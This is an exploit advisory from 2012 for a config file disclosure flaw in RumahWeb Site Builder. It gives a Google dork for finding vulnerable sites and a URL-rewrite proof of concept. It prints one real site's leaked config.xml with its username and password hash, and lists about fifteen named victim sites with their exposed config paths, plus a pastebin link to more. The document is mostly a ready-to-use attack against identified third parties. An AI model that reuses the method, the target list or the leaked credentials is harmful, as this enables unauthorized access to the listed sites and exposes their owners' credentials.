========================================================================================== 
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability 
==========================================================================================
 
:----------------------------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability 
: # Date : 08 Desember 2012 
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck) 
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL 
: # Category : Web Applications 
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability  
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English) 
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari 
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS 
===== 
intext:sitebuilder rumahweb
 
Proof of Concept 
================ 
[!] site/data/config/config.xml
For example you've searched it on google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml
 
-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or you got toyohashi-mosque.org/admin and you have to change the URL to oyohashi-mosque.org/data/config/config.xml


Example :
http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml 
More results? http://pastebin.com/4VZpiC7e